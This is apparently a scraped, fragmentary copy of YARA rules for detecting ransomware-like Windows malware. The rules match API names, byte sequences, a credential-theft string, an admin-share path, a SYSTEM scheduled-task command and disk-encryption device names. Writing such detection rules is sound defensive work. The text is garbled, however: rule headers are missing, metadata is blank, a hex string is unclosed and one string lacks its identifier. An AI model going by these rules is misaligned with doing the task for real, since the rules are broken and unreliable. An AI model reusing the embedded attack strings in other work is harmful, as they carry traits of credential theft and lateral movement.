$iter_encrypt = { 8D 44 24 3C
50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66
3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ??
$share_fmt_str =
“\\%ws\admin$\%ws” ascii fullword wide
(uint16(0) == 0x5A4D and
uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB
and all of them

author =
md5 =
rev = 1
$api1 =
“WriteProcessMemory” fullword
$api2 = “SetSecurityDescriptorDacl” fullword
$api_str1 = “BCryptDecrypt” ascii fullword
$mimi_str = “CredentialKeys”
ascii fullword wide
$wait_pipe_seq = { FF 15
?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24
1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0
83 FE FF 75 3B }
(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)
and filesize < 500KB and all of them

author =
md5 =
rev = 1
$api1 =
“CryptAcquireContextW” fullword
$api2 = “CryptEncrypt” fullword
$api3 = “NetWkstaGetInfo” fullword
$decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8
00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8
56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F
$msg1 = “Disk decryption
progress…” ascii fullword wide
$task_fmt_str = “schtasks /Create /SC ONCE /TN
viserion_%u /RU SYSTEM /TR “%ws” /ST
%02d:%02d:00″ ascii fullword wide
= “\\.\dcrypt” ascii fullword wide
$tok2 = “C:\Windows\cscc.dat” ascii fullword
(uint16(0) ==
0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize
< 150KB and all of them

Go to Source
Author: Barry Vengerik